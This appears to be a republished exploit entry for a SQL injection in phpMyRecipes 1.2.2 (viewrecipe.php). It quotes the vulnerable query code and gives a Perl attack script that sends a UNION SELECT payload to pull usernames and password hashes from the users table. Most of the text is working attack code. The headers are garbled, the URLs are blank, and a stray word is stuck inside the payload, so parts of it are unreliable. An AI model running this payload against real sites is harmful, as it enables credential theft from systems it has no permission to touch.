phpMyRecipes 1.2.2 (viewrecipe.php, r

2021 年 12 月 15 日1900

鏍囬橈細phpMyRecipes 1.2.2 SQL Injection Exploit

浣滆 cr4wl3r http://

涓嬭浇鍦板潃 http://

婕旂ず: http://

娴嬭瘯绯荤粺: Ubuntu Linux

婕忔礊椤甸潰锛 viewrecipe.php


# $r_id = $_GET['r_id'];


# if (! ($result = mysql_query("SELECT

# name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {

# dberror("viewrecipe.php", "Cannot select recipe");

# }


# http:// /[path]/recipes/viewrecipe.php?r_id=[SQLi]

#绀轰緥锛 http:// |




Usage :

perl $0 <host> <path>

ex : perl $0 /phpMyRecipes/




$target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host",

PeerPort=>"80") || die "[-] Can't connect to Server [ failed ]\n";

print "[+] Please Wait ...\n";

print $sock "GET $target HTTP/1.1\n";

print $sock "Accept: */*\n";

print $sock "User-Agent: BastardLabs\n";

print $sock "Host: $host\n";

print $sock "Connection: close\n\n";

sleep 2;

while ($answer = <$sock>) {

if ($answer =~ /<B>(.*?)<\/B>/) {

print "\n[+] Getting Username and Password [ ok ]\n";

sleep 1;

print "[+] w00tw00t\n";

print "[+] Username | Password --> $1\n";




print "[-] Exploit Failed !\n";

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